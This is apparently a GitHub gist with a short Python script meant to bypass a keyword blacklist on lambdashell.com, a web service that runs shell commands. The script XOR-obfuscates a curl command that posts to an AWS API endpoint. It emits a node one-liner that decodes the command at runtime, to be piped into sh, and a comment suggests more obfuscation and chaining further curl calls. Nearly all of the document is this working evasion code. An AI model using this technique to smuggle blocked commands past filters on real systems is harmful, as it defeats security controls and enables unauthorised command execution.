Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
http://www.lambdashell.com/ uses `command.includes('curl')` to blacklist curl, such a check can be bypassed by piping the output of this script into sh
from random import choices, seed
from sys import argv
payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev'''
seed(argv[1])
obfuscation_key = choices(range(256), k=len(payload))
obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]
print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.